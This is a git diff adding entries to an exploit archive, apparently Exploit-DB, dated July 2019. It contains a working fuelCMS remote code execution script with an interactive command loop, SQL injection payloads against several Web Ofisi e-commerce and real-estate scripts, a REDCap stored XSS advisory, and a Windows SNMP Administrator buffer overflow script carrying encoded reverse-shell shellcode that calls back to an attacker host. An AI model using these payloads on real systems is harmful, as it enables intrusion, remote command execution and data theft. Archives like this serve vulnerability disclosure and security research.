diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py new file mode 100755 index 000000000..971baab76 --- /dev/null +++ b/exploits/linux/webapps/47138.py @@ -0,0 +1,34 @@ +# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution +# Date: 2019-07-19 +# Exploit Author: 0xd0ff9 +# Vendor Homepage: https://www.getfuelcms.com/ +# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 +# Version: <= 1.4.1 +# Tested on: Ubuntu - Apache2 - php5 +# CVE : CVE-2018-16763 + + +import requests +import urllib + +url = "http://127.0.0.1:8881" +def find_nth_overlapping(haystack, needle, n): + start = haystack.find(needle) + while start >= 0 and n > 1: + start = haystack.find(needle, start+1) + n -= 1 + return start + +while 1: + xxxx = raw_input('cmd:') + burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" + proxy = {"http":"http://127.0.0.1:8080"} + r = requests.get(burp0_url, proxies=proxy) + + html = "" + htmlcharset = r.text.find(html) + + begin = r.text[0:20] + dup = find_nth_overlapping(r.text,begin,2) + + print r.text[0:dup] \ No newline at end of file diff --git a/exploits/linux/webapps/47139.txt b/exploits/linux/webapps/47139.txt new file mode 100644 index 000000000..b8d7f16b9 --- /dev/null +++ b/exploits/linux/webapps/47139.txt @@ -0,0 +1,14 @@ +# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html +# Demo Site: http://demobul.net/eticaretv3/ +# Version: v3 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: http://localhost/[PATH]/ara.html?a= +Vulnerable Parameter: a (GET) +Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf% \ No newline at end of file diff --git a/exploits/linux/webapps/47140.txt b/exploits/linux/webapps/47140.txt new file mode 100644 index 000000000..57c3fdb22 --- /dev/null +++ b/exploits/linux/webapps/47140.txt @@ -0,0 +1,21 @@ +# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html +# Demo Site: http://demobul.net/eticaretv5/ +# Version: v5 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: http://localhost/[PATH]/arama?kategori=&q= +Vulnerable Parameter: q (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z + +----- PoC 2: SQLi ----- + +Request: http://localhost/[PATH]/ajax/productsFilterSearch +Vulnerable Parameter: q (POST) +Payload: +kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1 \ No newline at end of file diff --git a/exploits/linux/webapps/47141.txt b/exploits/linux/webapps/47141.txt new file mode 100644 index 000000000..d3bf8ec78 --- /dev/null +++ b/exploits/linux/webapps/47141.txt @@ -0,0 +1,14 @@ +# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html +# Demo Site: http://demobul.net/emlakv2/ +# Version: v2 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: http://localhost/[PATH]/ara.html?ara= +Vulnerable Parameter: ara (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z \ No newline at end of file diff --git a/exploits/linux/webapps/47142.txt b/exploits/linux/webapps/47142.txt new file mode 100644 index 000000000..d238692fb --- /dev/null +++ b/exploits/linux/webapps/47142.txt @@ -0,0 +1,50 @@ +# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html +# Demo Site: http://demobul.net/emlakv3/ +# Version: V2 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: emlak_durumu (GET) +Payload: -1' OR 3*2*1=6 AND 000744=000744 -- + +----- PoC 2: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: emlak_tipi (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z + +----- PoC 3: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: il (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z + +----- PoC 4: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: ilce (GET) +Payload: -1' OR 3*2*1=6 AND 000397=000397 -- + +----- PoC 5: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: kelime (GET) +Payload: -1' OR 3*2*1=6 AND 000397=000397 -- + +----- PoC 6: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: semt (GET) +Payload: -1' OR 3*2*1=6 AND 000531=000531 -- \ No newline at end of file diff --git a/exploits/linux/webapps/47143.txt b/exploits/linux/webapps/47143.txt new file mode 100644 index 000000000..c166342a0 --- /dev/null +++ b/exploits/linux/webapps/47143.txt @@ -0,0 +1,15 @@ +# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html +# Demo Site: http://demobul.net/firma-rehberi-v1/ +# Version: v1 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: +http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni +Vulnerable Parameters: il,kelime,kat (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z \ No newline at end of file diff --git a/exploits/linux/webapps/47144.txt b/exploits/linux/webapps/47144.txt new file mode 100644 index 000000000..b0f169f23 --- /dev/null +++ b/exploits/linux/webapps/47144.txt @@ -0,0 +1,43 @@ +# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html +# Demo Site: http://demobul.net/rentacarv3/ +# Version: v3 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: kategori[] (GET) +Payload: if(now()=sysdate(),sleep(0),0) + +----- PoC 2: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: klima[] (GET) +Payload: 1 AND 3*2*1=6 AND 695=695 + +----- PoC 3: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: vites[] (GET) +Payload: 1 AND 3*2*1=6 AND 499=499 + +----- PoC 4: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: vites[] (GET) +Payload: 1 AND 3*2*1=6 AND 499=499 + +----- PoC 5: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: yakit[] (GET) +Payload: 1 AND 3*2*1=6 AND 602=602 \ No newline at end of file diff --git a/exploits/linux/webapps/47145.txt b/exploits/linux/webapps/47145.txt new file mode 100644 index 000000000..b6da6ab60 --- /dev/null +++ b/exploits/linux/webapps/47145.txt @@ -0,0 +1,13 @@ +# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html +# Demo Site: http://demobul.net/firmav13/ +# Version: v13 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- +Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1 +Vulnerable Parameters: oz[] (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z \ No newline at end of file diff --git a/exploits/php/webapps/47146.txt b/exploits/php/webapps/47146.txt new file mode 100644 index 000000000..987fbb85b --- /dev/null +++ b/exploits/php/webapps/47146.txt @@ -0,0 +1,60 @@ +# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting +# Date: 2019-07-19 +# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France +# Vendor Homepage: https://projectredcap.org +# Software Link: https://projectredcap.org +# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2 +# Tested on: 9.1.0 +# CVE: CVE-2019-13029 +# Security advisory: https://gitlab.com/snippets/1874216 + +### Stored XSS n°1 – Project name (found by Dylan GARNAUD) + +Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it. + +- Where? In project name +- Payload: `` +- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages. +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified + +### Stored XSS n°2 – Calendar (found by Dylan GARNAUD) + +- Where? Calendar event +- Payload: `` +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12 + +### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD) + +- Where? Wherever there is a CSV upload feature with displayed parsed results +- Payload: + ```csv + record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete + ,, + ``` +- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered. +- Privileges: It requires admin privileges to store it. +- URL examples of execution: + + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index + + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16 + +### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI) + +- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue) +- Payload: `` +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16 + +### Stored XSS n°5 – Survey (found by Alexandre ZANNI) + +- Where? In the survey management system. + + Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*). + + Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS. +- Payload: + ```html + + ``` +- Privileges: + + Store: It requires admin privileges to store it. + + Execute: Any unauthenticated user that can consult a survey. \ No newline at end of file diff --git a/exploits/windows_x86/remote/47137.py b/exploits/windows_x86/remote/47137.py new file mode 100755 index 000000000..3144dedf0 --- /dev/null +++ b/exploits/windows_x86/remote/47137.py @@ -0,0 +1,136 @@ +# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) +# Author: sasaga92 +# Discovery Date: 2019-07-18 +# Vendor Homepage: www.computerlab.com +# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager +# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE +# Tested on OS: Windows XP SP2 x86 +# CVE: N/A +# [+] Credits: John Page (aka hyp3rlinx) + + +#!/usr/bin/python + +import sys +import socket +import random +import string +import struct + + + +def pattern_create(_type,_length): + _type = _type.split(" ") + + if _type[0] == "trash": + return _type[1] * _length + elif _type[0] == "random": + return ''.join(random.choice(string.lowercase) for i in range(_length)) + elif _type[0] == "pattern": + _pattern = '' + _parts = ['A', 'a', '0'] + while len(_pattern) != _length: + _pattern += _parts[len(_pattern) % 3] + if len(_pattern) % 3 == 0: + _parts[2] = chr(ord(_parts[2]) + 1) + if _parts[2] > '9': + _parts[2] = '0' + _parts[1] = chr(ord(_parts[1]) + 1) + if _parts[1] > 'z': + _parts[1] = 'a' + _parts[0] = chr(ord(_parts[0]) + 1) + if _parts[0] > 'Z': + _parts[0] = 'A' + return _pattern + else: + return "Not Found" + +def pwned(_host, _port, _payload): + print "[*] Conectandose a {0}:{1}...".format(_host, _port) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((_host, _port)) + print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload)) + _payload = "{0}\r\n\r\n".format(_payload) + s.send(_payload) + _data = s.recv(1024) + s.shutdown + s.close + print 'Recibido:', repr(_data) + print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload)) + + +def main(): + + _host = "192.168.0.12" + _port = 987 + _offset_eip = 642200 + _padding = 642144 + _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3 + _tag = "w00tw00t" + + #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c + _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" + "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" + "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" + "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d" + "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70" + "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44" + "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f" + "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59" + "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42" + "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e" + "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51" + "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53" + "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b" + "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34" + "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63" + "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50" + "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b" + "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e" + "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44" + "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b" + "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b" + "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52" + "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c" + "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e" + "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64" + "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e" + "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b" + "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72" + "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70" + "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a" + "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45" + "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46" + "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57" + "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31" + "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f" + "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75" + "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70" + "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78" + "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36" + "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49" + "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58" + "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70" + "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55" + "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a" + "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65" + "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79" + "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31" + "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37" + "\x70\x73\x63\x69\x6f\x59\x45\x41\x41") + + _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + + _inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode)) + _inject += _tag + _inject += _shellcode + _inject += _egghunter + _inject += pattern_create("trash B", _offset_eip-len(_inject)) + _inject += _eip + + print(_inject) + pwned(_host,_port,_inject) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8692a374b..19425eec4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17560,6 +17560,7 @@ id,file,description,date,author,type,platform,port 47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple, 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux, 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows, +47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41514,3 +41515,12 @@ id,file,description,date,author,type,platform,port 47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux, 47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux, 47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux, +47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux, +47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47142,exploits/linux/webapps/47142.txt,"Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47143,exploits/linux/webapps/47143.txt,"Web Ofisi Firma Rehberi 1 - 'il' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47144,exploits/linux/webapps/47144.txt,"Web Ofisi Rent a Car 3 - 'klima' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, +47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,